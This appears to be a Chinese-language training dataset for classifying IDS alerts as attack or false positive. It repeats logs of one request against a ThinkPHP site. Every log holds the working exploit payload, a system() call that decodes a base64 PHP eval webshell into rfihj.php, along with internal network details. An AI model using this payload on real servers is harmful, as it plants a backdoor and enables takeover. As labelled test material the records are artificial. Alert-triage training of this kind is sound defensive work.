"0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/index.php?s=captcha", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6e", "s": "captcha", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224", "referer": "http://www.hn.sgcc.cn/index.php?s=captcha", "vlan_id": "", "vuln_type": "Shell命令执行(机器学习)", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvaW5kZXgucGhwP3M9Y2FwdGNoYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb29raWU6IFBIUFNFU1NJRD1nbmlnam1ramJ5aWNqeWdjaWx2YXVyYw0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL2luZGV4LnBocD9zPWNhcHRjaGENClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjA7IE1TLVJUQyBMTSA4OyBJbmZvUGF0aC4zOyAuTkVUNC4wQzsgLk5FVDQuMEUpIGNocm9tZWZyYW1lLzguMC41NTIuMjI0DQpDb250ZW50LUxlbmd0aDogMTQ0DQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KDQo=", "req_body": "X21ldGhvZD1fX2NvbnN0cnVjdCZtZXRob2Q9R0VUJmZpbHRlcltdPXN5c3RlbSZnZXRbXT1lY2hvIFBEOXdhSEFnSUdWamFHOG9iV1ExS0Nkakp5a3BPMEJsZG1Gc0tDUmZVRTlUVkZzbmVpZGRLVHM3UHo0PSAgfCBiYXNlNjQgLWQgID4+cmZpaGoucGhw", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_8a879af1d9da404f808fb73a834e8d1c", "access_time": "2024-11-27 10:09:17", "content-length": "144", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /index.php?s=captcha HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nCookie: PHPSESSID=gnigjmkjbyicjygcilvaurc\r\nReferer: http://www.hn.sgcc.cn/index.php?s=captcha\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224\r\nContent-Length: 144\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "_method=__construct&method=GET&filter[]=system&get[]=echo PD9waHAgIGVjaG8obWQ1KCdjJykpO0BldmFsKCRfUE9TVFsneiddKTs7Pz4= | base64 -d >>rfihj.php", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569454-Shell命令执行(机器学习)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"2.0.50727\", \"proto\": \"TCP\"}}", "sport": "51916", "h_url": "/index.php?s=captcha"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673357", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732673357, "vuln_harm": "该更新修复了由于框架对于控制器名没有做到足够的检测,造成可能的 GetShell", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "ThinkPHP", "hit_end": 39, "uri": "/index.php?s=captcha", "dport": 80, "vuln_name": "ThinkPHP 5.0.x—5.1 远程代码执行", "rsp_status": 0, "code_language": "PHP", "solution": "官方推荐尽快更新到最新版本。", "hit_start": 19, "detail_info": "2019 年 1 月 11 日, ThinkPHP 官方发布针对ThinkPHP 5.0.x—5.1 版本的重要更新,其中涉及一个安全更新.", "xff": "", "sip": "45.64.52.160", "vuln_desc": "2019 年 1 月 11 日, ThinkPHP 官方发布针对ThinkPHP 5.0.x—5.1 版本的重要更新,其中涉及一个安全更新.", "public_date": "2019-01-11 17:36:09", "sport": 51916}, "detail_info": "2019 年 1 月 11 日, ThinkPHP 官方发布针对ThinkPHP 5.0.x—5.1 版本的重要更新,其中涉及一个安全更新.", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/index.php", "first_access_time": "2024-11-27 10:09:17", "hazard_level": "8", "cookie": "PHPSESSID=gnigjmkjbyicjygcilvaurc", "method": "GET", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "ThinkPHP 5.0.x—5.1 远程代码执行", "alarm_sip": "172.31.193.55", "_method": "__construct", "skyeye_index": "", "sip_ioc_dip": "0bb9d7ad43221fc321c184e5c42b0d27", "xff": "", "vuln_desc": "2019 年 1 月 11 日, ThinkPHP 官方发布针对ThinkPHP 5.0.x—5.1 版本的重要更新,其中涉及一个安全更新.", "attack_chain": "0x02020000", "vuln_harm": "该更新修复了由于框架对于控制器名没有做到足够的检测,造成可能的 GetShell", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673337", "code_language": "PHP", "public_date": "2019-01-11 17:36:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "ThinkPHP", "super_attack_chain": "0x02000000", "hit_end": "39", "h_proto_version": "HTTP/1.1", "uri": "/index.php?s=captcha", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100205c8", "s": "captcha", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224", "referer": "http://www.hn.sgcc.cn/index.php?s=captcha", "vlan_id": "", "vuln_type": "ThinkPHP 5.0.x—5.1 远程代码执行", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "官方推荐尽快更新到最新版本。", "hit_start": "19", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvaW5kZXgucGhwP3M9Y2FwdGNoYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb29raWU6IFBIUFNFU1NJRD1nbmlnam1ramJ5aWNqeWdjaWx2YXVyYw0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL2luZGV4LnBocD9zPWNhcHRjaGENClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjA7IE1TLVJUQyBMTSA4OyBJbmZvUGF0aC4zOyAuTkVUNC4wQzsgLk5FVDQuMEUpIGNocm9tZWZyYW1lLzguMC41NTIuMjI0DQpDb250ZW50LUxlbmd0aDogMTQ0DQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KDQo=", "req_body": "X21ldGhvZD1fX2NvbnN0cnVjdCZtZXRob2Q9R0VUJmZpbHRlcltdPXN5c3RlbSZnZXRbXT1lY2hvIFBEOXdhSEFnSUdWamFHOG9iV1ExS0Nkakp5a3BPMEJsZG1Gc0tDUmZVRTlUVkZzbmVpZGRLVHM3UHo0PSAgfCBiYXNlNjQgLWQgID4+cmZpaGoucGhw", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_a9c42b68f732862225964accbc26c292", "access_time": "2024-11-27 10:09:17", "content-length": "144", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /index.php?s=captcha HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nCookie: PHPSESSID=gnigjmkjbyicjygcilvaurc\r\nReferer: http://www.hn.sgcc.cn/index.php?s=captcha\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224\r\nContent-Length: 144\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "_method=__construct&method=GET&filter[]=system&get[]=echo PD9waHAgIGVjaG8obWQ1KCdjJykpO0BldmFsKCRfUE9TVFsneiddKTs7Pz4= | base64 -d >>rfihj.php", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568008-ThinkPHP 5.0.x—5.1 远程代码执行", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"2.0.50727\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Chrome Frame/8.0.552\", \"hw_type\": \"PC\"}}", "sport": "51916", "h_url": "/index.php?s=captcha"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673357", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732673357, "vuln_harm": "攻击利用漏洞在目标系统上执行命令。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "", "hit_end": 130, "uri": "/index.php?s=captcha", "dport": 80, "vuln_name": "发现命令执行绕过攻击", "rsp_status": 0, "code_language": "", "solution": "修复漏洞,升级到安全版本。", "hit_start": 110, "detail_info": "web应用中存在命令执行、代码执行漏洞时,攻击者会利用这些漏洞对目标系统进行攻击。为了绕过防护产品的检测,攻击者会对payload进行编码、混淆处理。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "web应用中存在命令执行、代码执行漏洞时,攻击者会利用这些漏洞对目标系统进行攻击。为了绕过防护产品的检测,攻击者会对payload进行编码、混淆处理。", "public_date": "2023-03-31 14:48:03", "sport": 51916}, "detail_info": "web应用中存在命令执行、代码执行漏洞时,攻击者会利用这些漏洞对目标系统进行攻击。为了绕过防护产品的检测,攻击者会对payload进行编码、混淆处理。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/index.php", "first_access_time": "2024-11-27 10:09:17", "hazard_level": "6", "cookie": "PHPSESSID=gnigjmkjbyicjygcilvaurc", "method": "GET", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现命令执行绕过攻击", "alarm_sip": "172.31.193.55", "_method": "__construct", "skyeye_index": "", "sip_ioc_dip": "ca2f9374f07d9412a0c47941fc4e179f", "xff": "", "vuln_desc": "web应用中存在命令执行、代码执行漏洞时,攻击者会利用这些漏洞对目标系统进行攻击。为了绕过防护产品的检测,攻击者会对payload进行编码、混淆处理。", "attack_chain": "0x02020000", "vuln_harm": "攻击利用漏洞在目标系统上执行命令。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673337", "code_language": "", "public_date": "2023-03-31 14:48:03", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "130", "h_proto_version": "HTTP/1.1", "uri": "/index.php?s=captcha", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020bd2", "s": "captcha", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224", "referer": "http://www.hn.sgcc.cn/index.php?s=captcha", "vlan_id": "", "vuln_type": "发现命令执行绕过攻击", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "修复漏洞,升级到安全版本。", "hit_start": "110", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvaW5kZXgucGhwP3M9Y2FwdGNoYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb29raWU6IFBIUFNFU1NJRD1nbmlnam1ramJ5aWNqeWdjaWx2YXVyYw0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL2luZGV4LnBocD9zPWNhcHRjaGENClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjA7IE1TLVJUQyBMTSA4OyBJbmZvUGF0aC4zOyAuTkVUNC4wQzsgLk5FVDQuMEUpIGNocm9tZWZyYW1lLzguMC41NTIuMjI0DQpDb250ZW50LUxlbmd0aDogMTQ0DQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KDQo=", "req_body": "X21ldGhvZD1fX2NvbnN0cnVjdCZtZXRob2Q9R0VUJmZpbHRlcltdPXN5c3RlbSZnZXRbXT1lY2hvIFBEOXdhSEFnSUdWamFHOG9iV1ExS0Nkakp5a3BPMEJsZG1Gc0tDUmZVRTlUVkZzbmVpZGRLVHM3UHo0PSAgfCBiYXNlNjQgLWQgID4+cmZpaGoucGhw", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_9f93b965783bd4a88d95af4c727d3aa7", "access_time": "2024-11-27 10:09:17", "content-length": "144", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /index.php?s=captcha HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nCookie: PHPSESSID=gnigjmkjbyicjygcilvaurc\r\nReferer: http://www.hn.sgcc.cn/index.php?s=captcha\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224\r\nContent-Length: 144\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "_method=__construct&method=GET&filter[]=system&get[]=echo PD9waHAgIGVjaG8obWQ1KCdjJykpO0BldmFsKCRfUE9TVFsneiddKTs7Pz4= | base64 -d >>rfihj.php", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569554-发现命令执行绕过攻击", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"2.0.50727\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Chrome Frame/8.0.552\", \"hw_type\": \"PC\"}}", "sport": "51916", "h_url": "/index.php?s=captcha"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673357", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732673357, "vuln_harm": "攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 143, "uri": "/index.php?s=captcha", "dport": 80, "vuln_name": "发现系统命令注入行为", "rsp_status": 0, "code_language": "其他", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": 123, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "public_date": "2018-04-03 17:04:56", "sport": 51916}, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/index.php", "first_access_time": "2024-11-27 10:09:17", "hazard_level": "6", "cookie": "PHPSESSID=gnigjmkjbyicjygcilvaurc", "method": "GET", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现系统命令注入行为", "alarm_sip": "172.31.193.55", "_method": "__construct", "skyeye_index": "", "sip_ioc_dip": "a5607836cd0899e92c3ff1aa6e06fc37", "xff": "", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "attack_chain": "0x02010000", "vuln_harm": "攻击成功可以造成服务器被控制。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673337", "code_language": "其他", "public_date": "2018-04-03 17:04:56", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "143", "h_proto_version": "HTTP/1.1", "uri": "/index.php?s=captcha", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001384", "s": "captcha", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224", "referer": "http://www.hn.sgcc.cn/index.php?s=captcha", "vlan_id": "", "vuln_type": "发现系统命令注入行为", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": "123", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvaW5kZXgucGhwP3M9Y2FwdGNoYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb29raWU6IFBIUFNFU1NJRD1nbmlnam1ramJ5aWNqeWdjaWx2YXVyYw0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL2luZGV4LnBocD9zPWNhcHRjaGENClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjA7IE1TLVJUQyBMTSA4OyBJbmZvUGF0aC4zOyAuTkVUNC4wQzsgLk5FVDQuMEUpIGNocm9tZWZyYW1lLzguMC41NTIuMjI0DQpDb250ZW50LUxlbmd0aDogMTQ0DQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KDQo=", "req_body": "X21ldGhvZD1fX2NvbnN0cnVjdCZtZXRob2Q9R0VUJmZpbHRlcltdPXN5c3RlbSZnZXRbXT1lY2hvIFBEOXdhSEFnSUdWamFHOG9iV1ExS0Nkakp5a3BPMEJsZG1Gc0tDUmZVRTlUVkZzbmVpZGRLVHM3UHo0PSAgfCBiYXNlNjQgLWQgID4+cmZpaGoucGhw", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_12cefefe5e26689c2bab4b1ab7e3d21a", "access_time": "2024-11-27 10:09:17", "content-length": "144", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /index.php?s=captcha HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nCookie: PHPSESSID=gnigjmkjbyicjygcilvaurc\r\nReferer: http://www.hn.sgcc.cn/index.php?s=captcha\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224\r\nContent-Length: 144\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "_method=__construct&method=GET&filter[]=system&get[]=echo PD9waHAgIGVjaG8obWQ1KCdjJykpO0BldmFsKCRfUE9TVFsneiddKTs7Pz4= | base64 -d >>rfihj.php", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440452-发现系统命令注入行为", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"2.0.50727\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Chrome Frame/8.0.552\", \"hw_type\": \"PC\"}}", "sport": "51916", "h_url": "/index.php?s=captcha"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673357", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732673357, "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 127, "uri": "/index.php?s=captcha", "dport": 80, "vuln_name": "通用命令执行漏洞", "rsp_status": 0, "code_language": "通用", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": 107, "detail_info": "攻击者已经能够执行任意系统命令。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "攻击者已经能够执行任意系统命令。", "public_date": "2019-05-13 18:09:13", "sport": 51916}, "detail_info": "攻击者已经能够执行任意系统命令。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/index.php", "first_access_time": "2024-11-27 10:09:17", "hazard_level": "8", "cookie": "PHPSESSID=gnigjmkjbyicjygcilvaurc", "method": "GET", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "通用命令执行漏洞", "alarm_sip": "172.31.193.55", "_method": "__construct", "skyeye_index": "", "sip_ioc_dip": "6ea6d76d7f7edd3e7afca3779fcd398c", "xff": "", "vuln_desc": "攻击者已经能够执行任意系统命令。", "attack_chain": "0x02020000", "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673337", "code_language": "通用", "public_date": "2019-05-13 18:09:13", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "127", "h_proto_version": 